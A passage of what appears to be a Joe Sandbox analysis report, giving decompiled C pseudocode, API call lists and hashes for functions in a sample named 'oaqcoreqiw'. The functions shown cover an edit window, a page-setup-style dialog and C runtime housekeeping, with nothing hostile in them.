                                                  					GetClientRect( *0x10c3f24,  &_v20);
                                                  					_t17 =  !=  ? 0x50b000c4 : 0x50a00044;
                                                  					_t18 = CreateWindowExW(0x200, L"edit", 0,  !=  ? 0x50b000c4 : 0x50a00044, 0, 0, _v20.right, _v20.bottom,  *0x10c3f24, 0,  *0x10c3f20, 0);
                                                  					 *0x10c3f2c = _t18;
                                                  					SendMessageW(_t18, 0x30,  *0x10c3f30, 0);
                                                  					SetWindowTextW( *0x10c3f2c, _t31);
                                                  					SendMessageW( *0x10c3f2c, 0xb9, _t12, 0);
                                                  					SetFocus( *0x10c3f2c);
                                                  					HeapFree(GetProcessHeap(), 0, _t31);
                                                  					_t26 = 0 |  *0x10c3f9c == 0x00000000;
                                                  					 *0x10c3f9c = _t26;
                                                  					asm("sbb eax, eax");
                                                  					_t30 = CheckMenuItem(GetMenu( *0x10c3f24), 0x119,  ~_t26 & 0x00000008);
                                                  					__imp__#410( *0x10c3f2c, 0x10a2880, 0, 0, _t34);
                                                  					return _t30;
                                                  				}
                                                  				return _t10;
                                                  			}













                                                  APIs
                                                  • GetWindowTextLengthW.USER32 ref: 010A21FE
                                                  • GetProcessHeap.KERNEL32(00000000), ref: 010A220D
                                                  • HeapAlloc.KERNEL32(00000000), ref: 010A2214
                                                  • GetWindowTextW.USER32 ref: 010A222D
                                                  • SendMessageW.USER32(000000B8,00000000,00000000), ref: 010A2248
                                                  • DestroyWindow.USER32 ref: 010A2252
                                                  • GetClientRect.USER32 ref: 010A2262
                                                  • CreateWindowExW.USER32 ref: 010A22A3
                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 010A22B9
                                                  • SetWindowTextW.USER32(00000000), ref: 010A22C2
                                                  • SendMessageW.USER32(000000B9,00000000,00000000), ref: 010A22D6
                                                  • SetFocus.USER32 ref: 010A22DE
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010A22E7
                                                  • HeapFree.KERNEL32(00000000), ref: 010A22EE
                                                  • GetMenu.USER32(00000119), ref: 010A2317
                                                  • CheckMenuItem.USER32(00000000), ref: 010A231E
                                                  • #410.COMCTL32(010A2880,00000000,00000000), ref: 010A2333
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Window$Heap$MessageSendText$MenuProcess$#410AllocCheckClientCreateDestroyFocusFreeItemLengthRect
                                                  • String ID: edit
                                                  • API String ID: 2317382731-2167791130
                                                  • Opcode ID: 4fb1c42572464a47442d786c0c4fa3d639d2f88abba13bbf4ceed1f38e5a6e98
                                                  • Instruction ID: 10edfe82064319b03e1315704a2249590825abf2de24a43de09c37d32d48b037
                                                  • Opcode Fuzzy Hash: 4fb1c42572464a47442d786c0c4fa3d639d2f88abba13bbf4ceed1f38e5a6e98
                                                  • Instruction Fuzzy Hash: F931ED72250206FFEB312BA1ED9AF963A79FB08701F108424F6C5A9198D77B58159F14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E010A2600(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                  				void* _t21;
                                                  				void* _t48;
                                                  				void* _t61;
                                                  				struct HWND__* _t78;
                                                  				struct HWND__* _t79;
                                                  
                                                  				_t21 = _a8 - 0x110;
                                                  				if(_t21 == 0) {
                                                  					_t78 = _a4;
                                                  					SetDlgItemTextW(_t78, 0x141, 0x10c4ca0);
                                                  					SetDlgItemTextW(_t78, 0x143, 0x10c4ea8);
                                                  					SetDlgItemInt(_t78, 0x14d, (0x51eb851f *  *0x10c4c90 >> 0x20 >> 5 >> 0x1f) + (0x51eb851f *  *0x10c4c90 >> 0x20 >> 5), 0);
                                                  					SetDlgItemInt(_t78, 0x150, (0x51eb851f *  *0x10c4c94 >> 0x20 >> 5 >> 0x1f) + (0x51eb851f *  *0x10c4c94 >> 0x20 >> 5), 0);
                                                  					SetDlgItemInt(_t78, 0x147, (0x51eb851f *  *0x10c4c98 >> 0x20 >> 5 >> 0x1f) + (0x51eb851f *  *0x10c4c98 >> 0x20 >> 5), 0);
                                                  					SetDlgItemInt(_t78, 0x14a, (0x51eb851f *  *0x10c4c9c >> 0x20 >> 5 >> 0x1f) + (0x51eb851f *  *0x10c4c9c >> 0x20 >> 5), 0);
                                                  					goto L9;
                                                  				} else {
                                                  					if(_t21 != 1) {
                                                  						L9:
                                                  						return 0;
                                                  					} else {
                                                  						_t48 = _a12 - 1;
                                                  						if(_t48 == 0) {
                                                  							_t79 = _a4;
                                                  							GetDlgItemTextW(_t79, 0x141, 0x10c4ca0, 0);
                                                  							GetDlgItemTextW(_t79, 0x143, 0x10c4ea8, 0);
                                                  							 *0x10c4c90 = GetDlgItemInt(_t79, 0x14d, 0, 0) * 0x64;
                                                  							 *0x10c4c94 = GetDlgItemInt(_t79, 0x150, 0, 0) * 0x64;
                                                  							 *0x10c4c98 = GetDlgItemInt(_t79, 0x147, 0, 0) * 0x64;
                                                  							 *0x10c4c9c = GetDlgItemInt(_t79, 0x14a, 0, 0) * 0x64;
                                                  							EndDialog(_t79, 1);
                                                  							return 1;
                                                  						} else {
                                                  							_t61 = _t48 - 1;
                                                  							if(_t61 == 0) {
                                                  								EndDialog(_a4, 2);
                                                  								return 1;
                                                  							} else {
                                                  								if(_t61 != 7) {
                                                  									goto L9;
                                                  								} else {
                                                  									MessageBoxW( *0x10c3f24, L"Sorry, no help available", L"Help", 0x30);
                                                  									return 1;
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  			}









                                                  APIs
                                                  • MessageBoxW.USER32(Sorry, no help available,Help,00000030), ref: 010A263E
                                                  • EndDialog.USER32(?,00000002), ref: 010A2654
                                                  • GetDlgItemTextW.USER32(?,00000141,010C4CA0,00000000), ref: 010A267B
                                                  • GetDlgItemTextW.USER32(?,00000143,010C4EA8,00000000), ref: 010A268A
                                                  • GetDlgItemInt.USER32(?,0000014D,00000000,00000000), ref: 010A269C
                                                  • GetDlgItemInt.USER32(?,00000150,00000000,00000000), ref: 010A26B0
                                                  • GetDlgItemInt.USER32(?,00000147,00000000,00000000), ref: 010A26C4
                                                  • GetDlgItemInt.USER32(?,0000014A,00000000,00000000), ref: 010A26D8
                                                  • EndDialog.USER32(?,00000001), ref: 010A26E5
                                                  • SetDlgItemTextW.USER32 ref: 010A270A
                                                  • SetDlgItemTextW.USER32 ref: 010A2717
                                                  • SetDlgItemInt.USER32(?,0000014D,?,00000000), ref: 010A273D
                                                  • SetDlgItemInt.USER32(?,00000150,?,00000000), ref: 010A275D
                                                  • SetDlgItemInt.USER32(?,00000147,?,00000000), ref: 010A277D
                                                  • SetDlgItemInt.USER32(?,0000014A,?,00000000), ref: 010A279D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Item$Text$Dialog$Message
                                                  • String ID: Help$Sorry, no help available
                                                  • API String ID: 3223884555-856071037
                                                  • Opcode ID: 6d091967fcdedace25d588154406a258791e7b57040edebcef3ca7aebf525512
                                                  • Instruction ID: 28fe9ae9913a805be3ec31335ef15df6bf296d206d16ef08df91510d8753adf1
                                                  • Opcode Fuzzy Hash: 6d091967fcdedace25d588154406a258791e7b57040edebcef3ca7aebf525512
                                                  • Instruction Fuzzy Hash: 3441A9317903087BF62417ADAC83FBA7AA9E7D4F10F044036F385EE2D4C6E5A9015B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E010B6728(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* __ebp;
                                                  				intOrPtr _t12;
                                                  				intOrPtr _t13;
                                                  				intOrPtr _t17;
                                                  				intOrPtr* _t45;
                                                  
                                                  				if(_a4 > 5 || _a8 == 0) {
                                                  					L4:
                                                  					return 0;
                                                  				} else {
                                                  					_t45 = E010A8C83(8, 1);
                                                  					if(_t45 != 0) {
                                                  						_t12 = E010A8C83(0xb8, 1);
                                                  						 *_t45 = _t12;
                                                  						__eflags = _t12;
                                                  						if(_t12 != 0) {
                                                  							_t13 = E010A8C83(0x220, 1);
                                                  							 *((intOrPtr*)(_t45 + 4)) = _t13;
                                                  							__eflags = _t13;
                                                  							if(_t13 != 0) {
                                                  								E010B6250( *_t45, 0x10c1da0);
                                                  								__eflags = E010B6B48(__ebx, __edx, 1, _t45,  *_t45, _a4, _a8);
                                                  								if(__eflags != 0) {
                                                  									_t17 = E010A97EB(__edx, 1, __eflags,  *((intOrPtr*)( *_t45 + 4)),  *((intOrPtr*)(_t45 + 4)));
                                                  									__eflags = _t17;
                                                  									if(_t17 == 0) {
                                                  										 *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)))) = 1;
                                                  										L17:
                                                  										return _t45;
                                                  									}
                                                  									E010A8C4B( *((intOrPtr*)(_t45 + 4)));
                                                  									E010AEB5D( *_t45);
                                                  									E010AEA03( *_t45);
                                                  									E010A8C4B(_t45);
                                                  									L15:
                                                  									_t45 = 0;
                                                  									goto L17;
                                                  								}
                                                  								E010AEB5D( *_t45);
                                                  								E010AEA03( *_t45);
                                                  								E010A8C4B(_t45);
                                                  								goto L15;
                                                  							}
                                                  							E010A8C4B( *_t45);
                                                  							E010A8C4B(_t45);
                                                  							L8:
                                                  							goto L3;
                                                  						}
                                                  						E010A8C4B(_t45);
                                                  						goto L8;
                                                  					}
                                                  					L3:
                                                  					 *((intOrPtr*)(E010A6117())) = 0xc;
                                                  					goto L4;
                                                  				}
                                                  			}











                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref$Sleep__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                  • String ID:
                                                  • API String ID: 2661855409-0
                                                  • Opcode ID: a2e9e089b6541f68af114566a0688c3dd7f117c710c7ee7af15b200ca94d0fe3
                                                  • Instruction ID: b6698b5b4b186e8a0a6ae6b62b97c6a8c6a6124a953df3f5ee8031f81c8378b5
                                                  • Opcode Fuzzy Hash: a2e9e089b6541f68af114566a0688c3dd7f117c710c7ee7af15b200ca94d0fe3
                                                  • Instruction Fuzzy Hash: 9F213431045606EAEB223FA8DC48ECEBFE5FF61752B50846EE4C555061FF3398408A64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 78%
                                                  			E010A43D6(void* __eax, void* __ebx) {
                                                  				intOrPtr _t5;
                                                  				intOrPtr _t6;
                                                  				intOrPtr _t7;
                                                  				LONG* _t8;
                                                  				void* _t9;
                                                  				void* _t14;
                                                  				void* _t24;
                                                  				intOrPtr* _t25;
                                                  				intOrPtr* _t26;
                                                  
                                                  				_t14 = __ebx;
                                                  				__imp__DecodePointer( *0x10c3f08);
                                                  				_t25 =  *0x10c2140; // 0x0
                                                  				_t24 = __eax;
                                                  				if(_t25 != 0) {
                                                  					while( *_t25 != 0) {
                                                  						E010A8C4B( *_t25);
                                                  						_t25 = _t25 + 4;
                                                  						if(_t25 != 0) {
                                                  							continue;
                                                  						}
                                                  						break;
                                                  					}
                                                  					_t25 =  *0x10c2140; // 0x0
                                                  				}
                                                  				_push(_t14);
                                                  				E010A8C4B(_t25);
                                                  				_t26 =  *0x10c213c; // 0xf0fb38
                                                  				 *0x10c2140 = 0;
                                                  				if(_t26 != 0) {
                                                  					while( *_t26 != 0) {
                                                  						E010A8C4B( *_t26);
                                                  						_t26 = _t26 + 4;
                                                  						if(_t26 != 0) {
                                                  							continue;
                                                  						}
                                                  						break;
                                                  					}
                                                  					_t26 =  *0x10c213c; // 0xf0fb38
                                                  				}
                                                  				E010A8C4B(_t26);
                                                  				 *0x10c213c = 0;
                                                  				E010A8C4B( *0x10c2138);
                                                  				_t5 = E010A8C4B( *0x10c2134);
                                                  				 *0x10c2138 = 0;
                                                  				 *0x10c2134 = 0;
                                                  				if(_t24 != 0xffffffff) {
                                                  					_t5 = E010A8C4B(_t24);
                                                  				}
                                                  				__imp__EncodePointer(0);
                                                  				 *0x10c3f08 = _t5;
                                                  				_t6 =  *0x10c2a50; // 0x0
                                                  				if(_t6 != 0) {
                                                  					E010A8C4B(_t6);
                                                  					 *0x10c2a50 = 0;
                                                  				}
                                                  				_t7 =  *0x10c2a54; // 0x0
                                                  				if(_t7 != 0) {
                                                  					E010A8C4B(_t7);
                                                  					 *0x10c2a54 = 0;
                                                  				}
                                                  				_t8 = InterlockedDecrement( *0x10c16fc);
                                                  				if(_t8 == 0) {
                                                  					_t8 =  *0x10c16fc; // 0xf13230
                                                  					if(_t8 != 0x10c19f8) {
                                                  						_t9 = E010A8C4B(_t8);
                                                  						 *0x10c16fc = 0x10c19f8;
                                                  						return _t9;
                                                  					}
                                                  				}
                                                  				return _t8;
                                                  			}













                                                  APIs
                                                  • DecodePointer.KERNEL32 ref: 010A43DE
                                                  • _free.LIBCMT ref: 010A43F7
                                                    • Part of subcall function 010A8C4B: HeapFree.KERNEL32(00000000,00000000,?,010A88AB,00000000,?,?,010A7B46,010A3D79,010BEFC0,00000014), ref: 010A8C5F
                                                    • Part of subcall function 010A8C4B: GetLastError.KERNEL32(010C15B0,?,010A88AB,00000000,?,?,010A7B46,010A3D79,010BEFC0,00000014), ref: 010A8C71
                                                  • _free.LIBCMT ref: 010A440A
                                                  • _free.LIBCMT ref: 010A4428
                                                  • _free.LIBCMT ref: 010A443A
                                                  • _free.LIBCMT ref: 010A444B
                                                  • _free.LIBCMT ref: 010A4456
                                                  • _free.LIBCMT ref: 010A4470
                                                  • EncodePointer.KERNEL32(00000000), ref: 010A4477
                                                  • _free.LIBCMT ref: 010A448C
                                                  • _free.LIBCMT ref: 010A44A2
                                                  • InterlockedDecrement.KERNEL32 ref: 010A44B4
                                                  • _free.LIBCMT ref: 010A44CE
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: _free$Pointer$DecodeDecrementEncodeErrorFreeHeapInterlockedLast
                                                  • String ID:
                                                  • API String ID: 4264854383-0
                                                  • Opcode ID: 3f59c820730e33b1437fc1078dd92d109ec86f0f677a9cd5f6c42cd606024b40
                                                  • Instruction ID: 49cb8943cc238bacaf1c82f7eb73b6b2babcfc6f048d7d3298659976d4d44964
                                                  • Opcode Fuzzy Hash: 3f59c820730e33b1437fc1078dd92d109ec86f0f677a9cd5f6c42cd606024b40
                                                  • Instruction Fuzzy Hash: 88210879801212DFE7386FECF9544463FA4FB55722398816AEAC4E7559CF7E48828F40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 86%
                                                  			E010A7366(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                  				signed int _t81;
                                                  				void* _t86;
                                                  				long _t90;
                                                  				signed int _t94;
                                                  				signed int _t98;
                                                  				signed int _t99;
                                                  				signed char _t103;
                                                  				signed int _t105;
                                                  				intOrPtr _t106;
                                                  				intOrPtr* _t109;
                                                  				signed char _t111;
                                                  				long _t119;
                                                  				signed int _t130;
                                                  				signed int _t134;
                                                  				signed int _t135;
                                                  				signed int _t138;
                                                  				void** _t139;
                                                  				signed int _t141;
                                                  				void* _t142;
                                                  				signed int _t143;
                                                  				void** _t147;
                                                  				signed int _t149;
                                                  				void* _t150;
                                                  				signed int _t154;
                                                  				void* _t155;
                                                  				void* _t160;
                                                  
                                                  				_push(0x64);
                                                  				_push(0x10bf168);
                                                  				E010A61F0(__ebx, __edi, __esi);
                                                  				E010A8834(0xb);
                                                  				_t130 = 0;
                                                  				 *(_t155 - 4) = 0;
                                                  				_t160 =  *0x10c2de0 - _t130; // 0xf22f58
                                                  				if(_t160 == 0) {
                                                  					_push(0x40);
                                                  					_t141 = 0x20;
                                                  					_push(_t141);
                                                  					_t81 = E010A8C83();
                                                  					_t134 = _t81;
                                                  					 *(_t155 - 0x24) = _t134;
                                                  					__eflags = _t134;
                                                  					if(_t134 != 0) {
                                                  						 *0x10c2de0 = _t81;
                                                  						 *0x10c2dc0 = _t141;
                                                  						while(1) {
                                                  							__eflags = _t134 - _t81 + 0x800;
                                                  							if(_t134 >= _t81 + 0x800) {
                                                  								break;
                                                  							}
                                                  							 *((short*)(_t134 + 4)) = 0xa00;
                                                  							 *_t134 =  *_t134 | 0xffffffff;
                                                  							 *(_t134 + 8) = _t130;
                                                  							 *(_t134 + 0x24) =  *(_t134 + 0x24) & 0x00000080;
                                                  							 *(_t134 + 0x24) =  *(_t134 + 0x24) & 0x0000007f;
                                                  							 *((short*)(_t134 + 0x25)) = 0xa0a;
                                                  							 *(_t134 + 0x38) = _t130;
                                                  							 *(_t134 + 0x34) = _t130;
                                                  							_t134 = _t134 + 0x40;
                                                  							 *(_t155 - 0x24) = _t134;
                                                  							_t81 =  *0x10c2de0; // 0xf22f58
                                                  						}
                                                  						GetStartupInfoW(_t155 - 0x74);
                                                  						__eflags =  *((short*)(_t155 - 0x42));
                                                  						if( *((short*)(_t155 - 0x42)) == 0) {
                                                  							while(1) {
                                                  								L31:
                                                  								 *(_t155 - 0x2c) = _t130;
                                                  								__eflags = _t130 - 3;
                                                  								if(_t130 >= 3) {
                                                  									break;
                                                  								}
                                                  								_t147 = (_t130 << 6) +  *0x10c2de0;
                                                  								 *(_t155 - 0x24) = _t147;
                                                  								__eflags =  *_t147 - 0xffffffff;
                                                  								if( *_t147 == 0xffffffff) {
                                                  									L35:
                                                  									_t147[1] = 0x81;
                                                  									__eflags = _t130;
                                                  									if(_t130 != 0) {
                                                  										_t66 = _t130 - 1; // -1
                                                  										asm("sbb eax, eax");
                                                  										_t90 =  ~_t66 + 0xfffffff5;
                                                  										__eflags = _t90;
                                                  									} else {
                                                  										_t90 = 0xfffffff6;
                                                  									}
                                                  									_t142 = GetStdHandle(_t90);
                                                  									__eflags = _t142 - 0xffffffff;
                                                  									if(_t142 == 0xffffffff) {
                                                  										L47:
                                                  										_t147[1] = _t147[1] | 0x00000040;
                                                  										 *_t147 = 0xfffffffe;
                                                  										_t94 =  *0x10c2ee4; // 0xf21ca8
                                                  										__eflags = _t94;
                                                  										if(_t94 != 0) {
                                                  											 *( *((intOrPtr*)(_t94 + _t130 * 4)) + 0x10) = 0xfffffffe;
                                                  										}
                                                  										goto L49;
                                                  									} else {
                                                  										__eflags = _t142;
                                                  										if(_t142 == 0) {
                                                  											goto L47;
                                                  										}
                                                  										_t98 = GetFileType(_t142);
                                                  										__eflags = _t98;
                                                  										if(_t98 == 0) {
                                                  											goto L47;
                                                  										}
                                                  										 *_t147 = _t142;
                                                  										_t99 = _t98 & 0x000000ff;
                                                  										__eflags = _t99 - 2;
                                                  										if(_t99 != 2) {
                                                  											__eflags = _t99 - 3;
                                                  											if(_t99 != 3) {
                                                  												L46:
                                                  												_t70 =  &(_t147[3]); // -17575380
                                                  												InitializeCriticalSectionAndSpinCount(_t70, 0xfa0);
                                                  												_t147[2] = _t147[2] + 1;
                                                  												L49:
                                                  												_t130 = _t130 + 1;
                                                  												continue;
                                                  											}
                                                  											_t103 = _t147[1] | 0x00000008;
                                                  											__eflags = _t103;
                                                  											L45:
                                                  											_t147[1] = _t103;
                                                  											goto L46;
                                                  										}
                                                  										_t103 = _t147[1] | 0x00000040;
                                                  										goto L45;
                                                  									}
                                                  								}
                                                  								__eflags =  *_t147 - 0xfffffffe;
                                                  								if( *_t147 == 0xfffffffe) {
                                                  									goto L35;
                                                  								}
                                                  								_t147[1] = _t147[1] | 0x00000080;
                                                  								goto L49;
                                                  							}
                                                  							 *(_t155 - 4) = 0xfffffffe;
                                                  							E010A762A();
                                                  							L2:
                                                  							_t86 = 1;
                                                  							L3:
                                                  							return E010A6235(_t86);
                                                  						}
                                                  						_t105 =  *(_t155 - 0x40);
                                                  						__eflags = _t105;
                                                  						if(_t105 == 0) {
                                                  							goto L31;
                                                  						}
                                                  						_t135 =  *_t105;
                                                  						 *(_t155 - 0x1c) = _t135;
                                                  						_t106 = _t105 + 4;
                                                  						 *((intOrPtr*)(_t155 - 0x28)) = _t106;
                                                  						 *(_t155 - 0x20) = _t106 + _t135;
                                                  						__eflags = _t135 - 0x800;
                                                  						if(_t135 >= 0x800) {
                                                  							_t135 = 0x800;
                                                  							 *(_t155 - 0x1c) = 0x800;
                                                  						}
                                                  						_t149 = 1;
                                                  						__eflags = 1;
                                                  						 *(_t155 - 0x30) = 1;
                                                  						while(1) {
                                                  							__eflags =  *0x10c2dc0 - _t135; // 0x20
                                                  							if(__eflags >= 0) {
                                                  								break;
                                                  							}
                                                  							_t138 = E010A8C83(_t141, 0x40);
                                                  							 *(_t155 - 0x24) = _t138;
                                                  							__eflags = _t138;
                                                  							if(_t138 != 0) {
                                                  								0x10c2de0[_t149] = _t138;
                                                  								 *0x10c2dc0 =  *0x10c2dc0 + _t141;
                                                  								__eflags =  *0x10c2dc0;
                                                  								while(1) {
                                                  									__eflags = _t138 - 0x10c2de0[_t149] + 0x800;
                                                  									if(_t138 >= 0x10c2de0[_t149] + 0x800) {
                                                  										break;
                                                  									}
                                                  									 *((short*)(_t138 + 4)) = 0xa00;
                                                  									 *_t138 =  *_t138 | 0xffffffff;
                                                  									 *(_t138 + 8) = _t130;
                                                  									 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
                                                  									 *((short*)(_t138 + 0x25)) = 0xa0a;
                                                  									 *(_t138 + 0x38) = _t130;
                                                  									 *(_t138 + 0x34) = _t130;
                                                  									_t138 = _t138 + 0x40;
                                                  									 *(_t155 - 0x24) = _t138;
                                                  								}
                                                  								_t149 = _t149 + 1;
                                                  								 *(_t155 - 0x30) = _t149;
                                                  								_t135 =  *(_t155 - 0x1c);
                                                  								continue;
                                                  							}
                                                  							_t135 =  *0x10c2dc0; // 0x20
                                                  							 *(_t155 - 0x1c) = _t135;
                                                  							break;
                                                  						}
                                                  						_t143 = _t130;
                                                  						 *(_t155 - 0x2c) = _t143;
                                                  						_t109 =  *((intOrPtr*)(_t155 - 0x28));
                                                  						_t139 =  *(_t155 - 0x20);
                                                  						while(1) {
                                                  							__eflags = _t143 - _t135;
                                                  							if(_t143 >= _t135) {
                                                  								goto L31;
                                                  							}
                                                  							_t150 =  *_t139;
                                                  							__eflags = _t150 - 0xffffffff;
                                                  							if(_t150 == 0xffffffff) {
                                                  								L26:
                                                  								_t143 = _t143 + 1;
                                                  								 *(_t155 - 0x2c) = _t143;
                                                  								_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
                                                  								 *((intOrPtr*)(_t155 - 0x28)) = _t109;
                                                  								_t139 =  &(_t139[1]);
                                                  								 *(_t155 - 0x20) = _t139;
                                                  								continue;
                                                  							}
                                                  							__eflags = _t150 - 0xfffffffe;
                                                  							if(_t150 == 0xfffffffe) {
                                                  								goto L26;
                                                  							}
                                                  							_t111 =  *_t109;
                                                  							__eflags = _t111 & 0x00000001;
                                                  							if((_t111 & 0x00000001) == 0) {
                                                  								goto L26;
                                                  							}
                                                  							__eflags = _t111 & 0x00000008;
                                                  							if((_t111 & 0x00000008) != 0) {
                                                  								L24:
                                                  								_t154 = ((_t143 & 0x0000001f) << 6) + 0x10c2de0[_t143 >> 5];
                                                  								 *(_t155 - 0x24) = _t154;
                                                  								 *_t154 =  *_t139;
                                                  								 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
                                                  								_t38 = _t154 + 0xc; // 0xd
                                                  								InitializeCriticalSectionAndSpinCount(_t38, 0xfa0);
                                                  								_t39 = _t154 + 8;
                                                  								 *_t39 =  *(_t154 + 8) + 1;
                                                  								__eflags =  *_t39;
                                                  								_t139 =  *(_t155 - 0x20);
                                                  								L25:
                                                  								_t135 =  *(_t155 - 0x1c);
                                                  								goto L26;
                                                  							}
                                                  							_t119 = GetFileType(_t150);
                                                  							_t139 =  *(_t155 - 0x20);
                                                  							__eflags = _t119;
                                                  							if(_t119 == 0) {
                                                  								goto L25;
                                                  							}
                                                  							goto L24;
                                                  						}
                                                  						goto L31;
                                                  					}
                                                  					E010A6430(_t155, 0x10c12e0, _t155 - 0x10, 0xfffffffe);
                                                  					_t86 = 0;
                                                  					goto L3;
                                                  				}
                                                  				E010A6430(_t155, 0x10c12e0, _t155 - 0x10, 0xfffffffe);
                                                  				goto L2;
                                                  			}


                                                  APIs
                                                  • __lock.LIBCMT ref: 010A7374
                                                    • Part of subcall function 010A8834: __mtinitlocknum.LIBCMT ref: 010A8846
                                                    • Part of subcall function 010A8834: __amsg_exit.LIBCMT ref: 010A8852
                                                    • Part of subcall function 010A8834: EnterCriticalSection.KERNEL32(00000000,?,010A7AC9,0000000D), ref: 010A885F
                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 010A7392
                                                  • __calloc_crt.LIBCMT ref: 010A73AB
                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 010A73C6
                                                  • GetStartupInfoW.KERNEL32(?,010BF168,00000064), ref: 010A741B
                                                  • __calloc_crt.LIBCMT ref: 010A7466
                                                  • GetFileType.KERNEL32(00000001), ref: 010A74AD
                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 010A74E6
                                                  • GetStdHandle.KERNEL32(-000000F6), ref: 010A759F
                                                  • GetFileType.KERNEL32(00000000), ref: 010A75B1
                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(-010C2DD4,00000FA0), ref: 010A75E6
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__amsg_exit__lock__mtinitlocknum
                                                  • String ID:
                                                  • API String ID: 301580142-0
                                                  • Opcode ID: 45094ab88985f9fa112cef7e77d96cca6fb8f266cc24d37cd8c97db0fd12efa3
                                                  • Instruction ID: d1f24fc3699efed2d4afe8025cc911d00276a7615ee5998c638286cda392c291
                                                  • Opcode Fuzzy Hash: 45094ab88985f9fa112cef7e77d96cca6fb8f266cc24d37cd8c97db0fd12efa3
                                                  • Instruction Fuzzy Hash: B691B3719043468FDB24CFB8C8805ADBFF4AF09325B54866ED4E6AB3C1DB769802CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 84%
                                                  			E010B6818(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
                                                  				signed int _v8;
                                                  				signed int _v32;
                                                  				intOrPtr _v36;
                                                  				signed int _v40;
                                                  				void* _t38;
                                                  				signed int _t45;
                                                  				signed int _t60;
